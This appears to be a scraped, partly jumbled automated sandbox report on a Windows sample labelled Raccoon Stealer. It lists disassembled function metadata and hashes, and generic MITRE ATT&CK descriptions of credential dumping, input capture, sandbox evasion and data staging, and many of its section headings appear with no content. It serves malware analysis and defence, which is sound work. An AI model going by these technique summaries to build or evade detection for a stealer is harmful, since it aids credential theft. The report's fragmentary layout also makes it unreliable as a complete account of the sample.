Instruction Fuzzy Hash: F8E0C230668204ABC204EB51ED07B6AB3D8DB40B19F40865DBC9C422D0BFB8AD24D66B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0043E03E, Relevance: 4.6, APIs: 3, Instructions: 56timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000001,00000000), ref: 0043E076
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000), ref: 0043E084

Part of subcall function 0043D95B: FileTimeToSystemTime.KERNEL32(?,?,0542AFD8,0542AFD8,00000000,?,0043E09B,?,?,?,?,?,?,?,?,00000001), ref: 0043D970

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043E0B6

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 568878067-0
Opcode ID: c4a1475bebf23b47c5bec081c9681e59432db96943158db8f55715bca652824d
Instruction ID: 5dc5bb988949e37033fa7e8de2553708aac0068194ea5f1efb77c9820a47ae7e
Opcode Fuzzy Hash: c4a1475bebf23b47c5bec081c9681e59432db96943158db8f55715bca652824d
Instruction Fuzzy Hash: 53110DB1D00B189FDB25DFAAC8819EBFBF8FF08204B00492ED196D3650E774A504CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041E014, Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5b0e66b16ccbd8f0a40714c19fa5bdb7e71b6b32d28678020640cb824cf4a89
Instruction ID: 2b68b11eeb88712b8ce7400ea382997c22786c23b16cca6d2aeda21fdd285ab6
Opcode Fuzzy Hash: b5b0e66b16ccbd8f0a40714c19fa5bdb7e71b6b32d28678020640cb824cf4a89
Instruction Fuzzy Hash: 7AE11575E002299FCF14CFA9D590AEDBBF5FB88314F2481AAE855E7340D634A9818F54

Uniqueness

Uniqueness Score: -1.00%

Function 0045A0B2, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9a885f2fdba41f838a509d97cb48f81f2635d64a58ae0c9c204ea1fe0e0e8b7
Instruction ID: 0f35cd1cdfa2507b62c58bdd5256ef98e78387180735e39f6991d5b358c28599
Opcode Fuzzy Hash: a9a885f2fdba41f838a509d97cb48f81f2635d64a58ae0c9c204ea1fe0e0e8b7
Instruction Fuzzy Hash: 72F02B32650130DBC726DEAC8909B59739CF705B52F10825BED02E7392CAB8DE48D3CA

Uniqueness

Uniqueness Score: -1.00%

Function 0045A03D, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a384c0fe3c91c4020970930302fec913fc5f6a764468d93dc06b5bc6a1ce926e
Instruction ID: b71f545da49f6d3db7369e6d6598d851a446798c0fa16d89008dba216badf81b
Opcode Fuzzy Hash: a384c0fe3c91c4020970930302fec913fc5f6a764468d93dc06b5bc6a1ce926e
Instruction Fuzzy Hash: EFF03031621224DBCB26DF8CD845A4973ACEB45B55F11415BE901EB292C6B8DE04C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 0045A081, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 538c0dc1fdeaa7f402cbd69b372671aa0434c65f5ed6242623221e9b96d6851e
Instruction ID: 493225b8908fd9986b6f6fb6852177c2f8e07a3ab156e225542957066ff3c255
Opcode Fuzzy Hash: 538c0dc1fdeaa7f402cbd69b372671aa0434c65f5ed6242623221e9b96d6851e
Instruction Fuzzy Hash: 45E08C32921238EBCB14DF89C94498AF3ECEB84F06B11419BB901E3252C678DE04C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 00452076, Relevance: 22.9, APIs: 15, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004520E5
_free.LIBCMT ref: 004520FB
_free.LIBCMT ref: 0045210E
_free.LIBCMT ref: 00452123
_free.LIBCMT ref: 00452138
GetCPInfo.KERNEL32(?,?), ref: 00452182

Part of subcall function 0045D7C4: _free.LIBCMT ref: 0045D82F

_free.LIBCMT ref: 004523ED
_free.LIBCMT ref: 00452400
_free.LIBCMT ref: 0045240E
_free.LIBCMT ref: 00452419
_free.LIBCMT ref: 0045245B
_free.LIBCMT ref: 00452463
_free.LIBCMT ref: 00452469
_free.LIBCMT ref: 00452471
_free.LIBCMT ref: 0045247F

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: ce6e17dd82e3a8efe33135580eee7504c7126289ae541df62186c5519f210c63
Instruction ID: d2e0628ef23e4c9b2675df8823be0be2d1987371ec530bc30c7eab761a6d51e8
Opcode Fuzzy Hash: ce6e17dd82e3a8efe33135580eee7504c7126289ae541df62186c5519f210c63
Instruction Fuzzy Hash: B2D1AE719002059FDB11CF79C981BAEBBF5BF0A301F14412FE995A7342DBB8A9498B64

Uniqueness

Uniqueness Score: -1.00%

Function 00424016, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 162COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042401B

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Strings

while parsing , xrefs: 00424061
unexpected , xrefs: 004241A0
6rkw, xrefs: 00424102, 00424154
syntax error , xrefs: 00424038
; last read: ', xrefs: 004240F6
; expected , xrefs: 004241FF

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID: 6rkw$; expected $; last read: '$syntax error $unexpected $while parsing
API String ID: 3708980276-377966253
Opcode ID: b1977ffd6a9694b61900a20887daa8e92af6749686915b77e804b83c75a7e27b
Instruction ID: 81074ebcdcb79a76691b02df632c9b039df9ed7aba0e7bb70cb7591c71e232d5
Opcode Fuzzy Hash: b1977ffd6a9694b61900a20887daa8e92af6749686915b77e804b83c75a7e27b
Instruction Fuzzy Hash: C3617F70900208DFCB05EFA5C991BEDFBB4AF58314F54405EE009F7282DBB85A99DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004280D6, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004280DB

Strings

object_element, xrefs: 00428235
not keep_stack.empty(), xrefs: 004280FC
not key_keep_stack.empty(), xrefs: 004281EF
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 004281AE
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 004280EB, 004280FB, 004281AD, 004281EE, 00428230

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: 4a495dc74c46c9530ee6837ae531c37f4910c6bfef5c9e9643f61759229618e9
Instruction ID: 02a3948f5721aa9a7a5a529718c8f0f58267128f42a49cbeb15ad061ff2bd8ad
Opcode Fuzzy Hash: 4a495dc74c46c9530ee6837ae531c37f4910c6bfef5c9e9643f61759229618e9
Instruction Fuzzy Hash: 24510430B01114DFDB04DF65D486BAE7BA5FF45314F84809EE8055B282DB78AC55CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0042C0C7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0042C0E2
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 0042C107

Strings

image/jpeg, xrefs: 0042C115

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EncodersGdipImage$Size
String ID: image/jpeg
API String ID: 864223233-3785015651
Opcode ID: 1e918e1725a8a157f9196d56c2c9260e5b01738356bce498a86fa547f4107225
Instruction ID: 808b449813365729b0edeeee678a10cb9db49e559912ab6d87952b6290e95faf
Opcode Fuzzy Hash: 1e918e1725a8a157f9196d56c2c9260e5b01738356bce498a86fa547f4107225
Instruction Fuzzy Hash: 5111E732E00118EB8B109F999CC14AEBBB5FE45360B60016BF81073291C7755E559E98

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Aqlmlmmeey.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Raccoon Stealer

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre